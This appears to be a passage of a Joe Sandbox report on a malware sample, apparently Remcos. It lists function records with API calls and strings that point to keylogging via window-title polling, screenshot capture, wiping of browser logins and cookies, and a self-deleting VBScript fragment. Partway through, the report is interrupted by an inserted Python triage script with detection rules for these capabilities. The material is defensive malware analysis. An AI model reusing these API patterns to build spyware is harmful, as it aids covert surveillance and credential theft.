                              • String ID:
                              • API String ID: 3360349984-0
                              • Opcode ID: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                              • Opcode Fuzzy Hash: 687cc25b70590890ee4835b3ee453ca5d573141b8347a1c076274b7774bdc746
                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                              APIs
                              Strings
                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                              • API String ID: 3472027048-1236744412
                              • Opcode ID: f93b6b6c96551599ebd69fe64bee0d63dad0637a340ebfcf96dabdaa3587bf98
                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                              • Opcode Fuzzy Hash: f93b6b6c96551599ebd69fe64bee0d63dad0637a340ebfcf96dabdaa3587bf98
                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                              APIs
                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQuerySleepValue
                              • String ID: @CG$exepath$BG
                              • API String ID: 4119054056-3221201242
                              • Opcode ID: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                              • Opcode Fuzzy Hash: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: SystemTimes$Sleep__aulldiv
                              • String ID:
                              • API String ID: 188215759-0
                              • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                              • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                              • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                              • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                              APIs
                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Window$SleepText$ForegroundLength
                              • String ID: [ $ ]
                              • API String ID: 3309952895-93608704
                              • Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                              • Opcode Fuzzy Hash: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                              APIs
                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandlePointerWrite
                              • String ID:
                              • API String ID: 3604237281-0
                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                              APIs
                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                              • String ID:
                              • API String ID: 737400349-0
                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                              APIs
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad$ErrorLast
                              • String ID:
                              • API String ID: 3177248105-0
                              • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                              • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                              • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                              • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                              APIs
                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleReadSize
                              • String ID:
                              • API String ID: 3919263394-0
                              • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                              • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                              APIs
                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: MetricsSystem
                              • String ID:
                              • API String ID: 4116985748-0
                              • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                              • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                              • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                              • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
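The records above list raw call sites and summary IDs per function, which is slow to read by hand. The following added example (not part of the Joe Sandbox report and not code from the Remcos sample) parses that record layout and turns API combinations into the capability tags the report's signatures describe: the GetForegroundWindow/GetWindowTextW/Sleep window-title poller, the HKCU RegOpenKeyExA/RegQueryValueExA read of the 'exepath' value, the four virtual-screen GetSystemMetrics calls that precede a screenshot, and the "Cleared browsers logins and cookies." string. The rule table and tag names are an analyst heuristic written for this example, and the embedded input is a set of records abridged from this page's own text.

```python
"""Capability triage for Joe Sandbox IDA-plugin function records.

Added example: not Joe Sandbox code and not code from the Remcos sample.
It parses the record layout used on this page ('APIs' call lines, the
'String ID' / 'Opcode ID' fields, 'Instruction Fuzzy Hash' closing each
record) and maps API combinations to capability tags. The rule table is
an analyst heuristic written for this example, not a Joe Sandbox feature.
"""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed input: four records abridged from this report's own text.
SAMPLE_RECORDS = """\
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• Sleep.KERNEL32(00000BB8), ref: 004115C3
• String ID: @CG$exepath$BG
• Opcode ID: fd72609be73d1f1783dbf1d279e952d5808c6a47d3307a1485aff8893a4aba73
• Instruction Fuzzy Hash: C221F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?), ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• String ID: [ $ ]
• Opcode ID: 7d648279a39037f0c5f174499f798c92f938224ad1328bcf7918cf7612db1a1c
• Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
• GetSystemMetrics.USER32(0000004C), ref: 00418519
• GetSystemMetrics.USER32(0000004D), ref: 0041851F
• GetSystemMetrics.USER32(0000004E), ref: 00418525
• GetSystemMetrics.USER32(0000004F), ref: 0041852B
• String ID:
• Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
• Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• Opcode ID: f93b6b6c96551599ebd69fe64bee0d63dad0637a340ebfcf96dabdaa3587bf98
• Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
"""

FIELD_RE = re.compile(r"•\s*(String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*)")
# 'Api.DLL(args), ref: callsite'; args may nest one level of parentheses
CALL_RE = re.compile(r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                     r"(\w+)\.(\w+)\(((?:[^()]|\([^()]*\))*)\).*?ref:\s*([0-9A-Fa-f]+)")
Call = namedtuple("Call", "api dll args site")

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    string_id: str = ""
    calls: list = field(default_factory=list)

def parse_records(text):
    """Split report text into FunctionRecord objects."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        f = FIELD_RE.search(line)  # fields first: a String ID holding 'a.b(' must not parse as a call
        if f:
            key, val = f.group(1), f.group(2).strip()
            if key == "String ID":
                cur.string_id = val
            elif key == "Opcode ID":
                cur.opcode_id = val
            else:  # Instruction Fuzzy Hash is the last field of a record
                records.append(cur)
                cur = FunctionRecord()
            continue
        c = CALL_RE.search(line)
        if c:
            api, dll, args, site = c.groups()
            cur.calls.append(Call(api, dll, [a.strip() for a in args.split(",")] if args else [], site))
    return records

HKEY_CURRENT_USER = "80000001"
# SM_XVIRTUALSCREEN, SM_YVIRTUALSCREEN, SM_CXVIRTUALSCREEN, SM_CYVIRTUALSCREEN
VIRTUAL_SCREEN_METRICS = {"0000004C", "0000004D", "0000004E", "0000004F"}

def classify(rec):
    """Analyst heuristics for one record; returns a set of capability tags."""
    apis = {c.api for c in rec.calls}
    strings = rec.string_id.split("$") if rec.string_id else []
    tags = set()
    if {"GetForegroundWindow", "GetWindowTextW", "Sleep"} <= apis:
        tags.add("keylogger: polls the active window title")
    hkcu = any(c.api == "RegOpenKeyExA" and c.args[:1] == [HKEY_CURRENT_USER] for c in rec.calls)
    if hkcu and "RegQueryValueExA" in apis and "exepath" in strings:
        tags.add("reads install path 'exepath' from HKCU")
    metrics = {c.args[0] for c in rec.calls if c.api == "GetSystemMetrics" and c.args}
    if VIRTUAL_SCREEN_METRICS <= metrics:
        tags.add("queries virtual-screen geometry (screenshot setup)")
    if any("Cleared browsers logins and cookies" in s for s in strings):
        tags.add("wipes browser logins and cookies")
    return tags

def triage(text):
    """Opcode ID -> sorted tags, for every record that matched at least one rule."""
    return {r.opcode_id: sorted(t) for r in parse_records(text) if (t := classify(r))}
```

Run `triage(SAMPLE_RECORDS)` on the embedded records, or paste the function-record portion of a report into the same call; the Opcode ID keys can then be matched against the records on this page. Summary fields are matched before call lines because some String IDs (for instance the VBScript fragment `fso.DeleteFile(Wscript.ScriptFullName)` seen in the CreateFileW record above) look like `Api.DLL(...)` calls.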
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CountEventTick
                              • String ID: >G
                              • API String ID: 180926312-1296849874
                              • Opcode ID: 526d7ca2505a7983556bdafa8031fb7c86d7427c55477993c06890729ecb053e
                              • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                              • Opcode Fuzzy Hash: 526d7ca2505a7983556bdafa8031fb7c86d7427c55477993c06890729ecb053e
                              • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                              APIs
                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Info
                              • String ID: $fD
                              • API String ID: 1807457897-3092946448
                              • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                              • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                              • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                              • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                              APIs
                              • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                              • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                              • String ID: image/jpeg
                              • API String ID: 1291196975-3785015651
                              • Opcode ID: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                              • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                              • Opcode Fuzzy Hash: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                              • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                              APIs
                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                              Strings
                              Memory Dump Source
